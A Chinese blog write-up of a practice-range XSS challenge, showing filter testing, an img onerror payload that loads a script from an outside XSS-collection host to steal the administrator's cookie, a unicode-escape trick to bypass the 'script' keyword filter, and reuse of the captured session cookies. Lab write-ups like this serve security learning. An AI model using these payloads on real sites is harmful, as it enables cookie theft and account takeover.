安鸾靶场XSS挖掘&绕过

最新推荐文章于 2024-03-19 15:00:00 发布
最新推荐文章于 2024-03-19 15:00:00 发布
阅读量209 收藏
点赞数
文章标签: xss 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76683178/article/details/132038953
版权
文章讲述了作者尝试在网页中注入XSS代码,最初使用`<scirp>`标签被过滤,然后通过编码`<script>`标签和构造`<img>`标签的JavaScript代码绕过过滤。作者还提到需要管理员的cookie和特定参数才能成功执行脚本,并猜测了一个可能的管理员界面地址。
摘要由CSDN通过智能技术生成

传统方法试一下,发现scirp标签被过滤掉了

<script>alert("xss");</script>

直接换一种标签接着测肯能不能弹窗

<img src=1 οnerrοr=alert("xss");>

使用<img>标签时弹窗了,说明没有对img标签进行过滤

自己构造一个img标签的js代码,让管理员带着cookie来见我

<img src=x οnerrοr=s=createElement('script');body.appendChild(s);s.src='http://vpn.whalwl.work:18080/5GlYEi?1690861593';>

 

没注意到上面的语句还有一个'scirp',导致被过滤,js语法错误

重新构造,给scirp转码绕过

<img src=x οnerrοr=s=createElement('\u0073\u0063\u0072\u0069\u0070\u0074');body.appendChild(s);s.src='http://vpn.whalwl.work:18080/5GlYEi?1690861593';>

 

 

绕过成功了  

 

发现有三个必要参数,cookie,roc_login,roc_secure

把这三个弄到小饼干上,盲猜一波管理员网站的地址是admin,http://106.15.50.112:8013/admin

回车

 

「已注销」
关注
xss绕过尖括号和双括号_xss防御及绕过-小记1
weixin_29315091的博客
12-23 3013
XSS搞安全的应该都很熟悉。本次并不是说其原理,仅是分享下在测试过程中遇到的案例。本人小白一枚,所以案例大佬们看着可能非常简单,就当是记录下自己笔记吧,不喜勿喷哈。。关于xss的防御,基本上都是采用输入过滤,输出编码。最近做的一个项目中的某个模块中,进行了输入过滤,采用跳转的形式。比如遇到<>或alert,响应包就会302跳转到固定网址。遇到这种黑名单的可以尝试各种绕过。有些输入是在i...
xss绕过
Miracle_ze的博客
07-29 747
xss绕过
XSS绕过技巧
weixin_52501704的博客
02-10 4755
XSS绕过技巧
XSSXSS挖掘&绕过
zh的博客
10-11 565
靶场地址:http://www.whalwl.top:8013 解题准备:本题需要绕过特殊符号的过滤 解题思路: 根据主页留言板,管理员告诉我们flag在它那里,于是给他私信,让它中招 1、首先新建两个小号,互相测试哪种代码能够成功绕过过滤 确定XSS代码后,再给管理员发私信,通过xss平台成功获取管理员cookie。 经过小号互相测试,发现私信会过滤<s以及script,采用<img报错触发代码可以绕过,顺利收集cookie <img...
SRC实战 | edu某学院-存储型xss漏洞小思路
最新发布
zkaqlaoniao的博客
03-19 415
前话:XSS漏洞并不多见,而且反射型基本都不会收【危害太低】,所以要找到存储型xss,见框就插的方法没有用了【除非运气特别好】这时候就得改变一下思路,找一些隐秘的传参有回显的点;
存储型XSS简介
热门推荐
seek_2022的博客
05-05 1万+
文章目录一、存储型XSS简介(一)存储型XSS的概念(二)存储型XSS攻击过程(三)打XSS的潜在风险二、XSS平台使用方法三、靶场实战 一、存储型XSS简介 (一)存储型XSS的概念 存储型XSS又称持久型XSS,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。反射型XSS的被攻击对象一般是攻击者去寻找的,就比如说:一个攻击者想盗取A的账号,那么攻击者就可以将一个含有反射型XSS的特制URL链接发送给A,然后用花言巧语诱骗A点击链接。当A不小心点进去时,就会立即受到XSS攻击。这种
Webservice之应用协议SOAP
心火燃烧!
11-08 598
什么是SOAP? SOAP 是一种简单的基于 XML 的协议,它使应用程序通过 HTTP 来交换信息。或者更简单地说:SOAP 是用于访问网络服务的协议。 SOAP 指简易对象访问协议 SOAP 是一种通信协议 SOAP 用于应用程序之间的通信 SOAP 是一种用于发送消息的格式 SOAP 被设计用来通过因特网进行通信 SOAP 独立于平台 SOAP 独立于语言 SOAP 基于 XML SOAP...
XSSBypass:XSS绕过技术
05-17
**XSS(跨站脚本攻击)Bypass:探索XSS绕过技术** XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本,进而执行非授权的操作。当Web应用程序未能充分地验证和转义...
第十二节 XSS 过滤器绕过-01
09-15
XSS 过滤器绕过技术详解 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的 Web 应用程序安全漏洞,攻击者可以通过插入恶意脚本来盗取用户信息、破坏网站操作等。为防止 XSS 攻击,开发者通常会使用 XSS 过滤...
看完这篇,保证你学网络安全一帆风顺!
qq_69775412的博客
04-18 780
不是简单的远控软件,而是作为一名专业的网络安全工程师必须要知道的Hydra、medusa、sqlmap、AWVS、Burpsuite、Beef-XSS、Metasploit、Nessus、wireshark等安全工具,这些都是在这个圈子里比较常用的。总有人抱怨黑客入门太难了,然后仔细了解之后却发现,觉得难是因为看的视频教程都不是配套的,都是这里学一点、那里学一点,脑子里连基本的框架都没有。网络安全入门,入门就是要把知识讲的逻辑清晰、言简意赅、通俗易懂,把复杂的东西简单化,才是有能力的体现。
XSS:交友平台XSS漏洞
zh的博客
10-11 519
靶场地址:http://www.whalwl.top:8033 解题准备:本题需要破解验证码,php和python脚本均可 解题思路: 1、注册,登录,出现两个链接 两个都点开看看,第一个是更新资料页面,尝试XSS弹窗 发现输入的代码原样显示,并没有起作用,此页面没有源代码,只能查看元素 发现一对可疑元素<textarea></textarea>包括了输入的代码。 于是先尝试闭合这个元素,点击更新,成功弹窗。 </textarea>a..
安鸾渗透实战平台wp(持续更新)
Delity的博客
05-13 6876
一、SQL注入 SQL数字型GET注入01 漏洞URL:http://www.whalwl.top:8001/bug/sql_injection/sql_num.php 1’报错,输入-1返回正常,构造payload, 判断字段:显示位在第二位和第三位 -1 order by 3 # 爆库: -1 union select 1,database(),3 # 爆表: -1 union select 1,group_concat(table_name),3 from information_sch
xss绕过方法有哪些?XSS攻击绕过过滤方法技巧分享(xss绕过宝塔)
白帽子佳奇的博客
12-12 4986
XSS(跨站脚本攻击)绕过方法是一系列技巧,用来绕过目标网站的安全措施和过滤器,执行恶意的脚本。
安鸾之XXE漏洞
柠鹿的轨迹
01-13 2318
安鸾之XXE漏洞
安鸾渗透实战平台-sql注入篇
weixin_48421613的博客
01-04 3389
sql注入篇 安鸾渗透实战平台是一个在线的靶场平台,需要通过一些列手段找到flag提交 文章目录sql注入篇SQL字符型注入(1-2)一、需识别mysql默认的information库二、内部结构1.schemata表内容2.tables表内容3.columns表内容4.解题思路SQL搜索型注入总结 SQL字符型注入(1-2) 开始忘记截图了,只好给大家直接写一下payload了 提示:仅适合参考 一、需识别mysql默认的information库 mysql 5.0版本以上会有一个默认的infor
存储型xss_存储型的跨站脚本攻击(XSS
weixin_39912580的博客
12-12 976
存储型的XSS和反射型的XSS最大的区别就是在于存储是永久性的,这段恶意信息会被写入到数据库中,每次打开被注入恶意代码的页面均会被攻击这种方式通常是发生在论坛,评论,留言等地方,这些能够存储相关信息也能显示出来的地方,所以危害最大而其他两种方式则通常是通过链接的方式进入,只要对不明站点提高警惕则不会被攻击,而存储型通常是在用户信任的网页中防护等级:低首先添...
存储型xss_安全测试之XSS
weixin_39989159的博客
11-29 1640
安全测试之跨站脚本攻击(XSS)前言随着互联网的不断发展,web应用的互动性也越来越强。但正如一个硬币会有两面一样,在用户体验提升的同时安全风险也会跟着有所增加。今天,我们就来讲一讲web渗透中常见的一种攻击方式:XSS攻击。(一)什么是XSS攻击先上一段标准解释(摘自百度百科)。“XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style ...
存储型XSS漏洞
A1956936030的博客
10-21 2725
什么是存储型XSS: 攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。这就意味着只要访问了这个页面的访客,都有可能会执行这段恶意脚本,因此储存型XSS的危害会更大。因为存储型XSS的代码存在于网页的代码中,可以说是永久型的。 1.弹框测试 添加js,选择alert.js 点击生成payload并复制 复制 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值